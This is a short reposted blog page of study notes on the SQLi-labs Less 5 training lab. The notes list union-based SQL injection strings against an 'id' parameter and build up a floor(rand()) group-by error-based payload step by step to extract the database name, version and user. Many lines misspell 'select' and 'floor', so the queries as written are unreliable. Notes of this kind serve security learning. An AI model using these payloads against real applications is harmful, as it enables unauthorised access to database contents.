zoukankan      html  css  js  c++  java
  • sqlilabs 5

    第一个1不断返回true,2可以进行更改
    ?id=-1' union select 1,2,3 and '1
    ?id=-1' union select 1,2,3 and 1='1

    ?id=-1' union select 1,@@datadir,3 and '1
    @@datadir可以替换为 current_user,database() etc..

    select rand();
    select foor();

    select table_name,table_schema from information_schema.tables group by table_schema;

    select database();
    slect(select database());
    slect concat (select database());
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a);
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

  • 相关阅读:
    标题:CSS-button添加display:block;属性后自动换行!
    JS-遍历对象
    JS-获取对象的长度大小
    HTML-span和div区别
    SQL-Foreach标签
    JS_Select_option切换自动触发事件
    JS_Select赋值的几种方式
    加密系统文件夹
    JS-返回上一页
    metronic 4.5.7开发环境下, 在Windows 10上安装了10.16.0版本的node js之后,导致node sass无法加载
  • 原文地址:https://www.cnblogs.com/CMlhc/p/8858973.html
Copyright © 2011-2022 走看看